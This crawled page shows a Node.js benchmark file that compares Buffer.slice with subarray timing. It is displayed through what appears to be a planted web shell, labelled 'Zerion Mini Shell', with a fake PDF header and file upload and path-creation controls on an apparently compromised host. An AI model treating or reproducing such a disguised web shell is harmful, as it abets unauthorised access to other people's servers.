%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/node/benchmark/buffers/
Upload File :
Create Path :
Current File : /home/vacivi36/vittasync.vacivitta.com.br/vittasync/node/benchmark/buffers/buffer-slice.js

'use strict';
const common = require('../common.js');
const SlowBuffer = require('buffer').SlowBuffer;

const bench = common.createBenchmark(main, {
  type: ['fast', 'slow', 'subarray'],
  n: [1e6],
});

const buf = Buffer.allocUnsafe(1024);
const slowBuf = new SlowBuffer(1024);

function main({ n, type }) {
  const b = type === 'slow' ? slowBuf : buf;
  const fn = type === 'subarray' ?
    () => b.subarray(10, 256) :
    () => b.slice(10, 256);

  bench.start();
  for (let i = 0; i < n; i++) {
    fn();
  }
  bench.end(n);
}

Zerion Mini Shell 1.0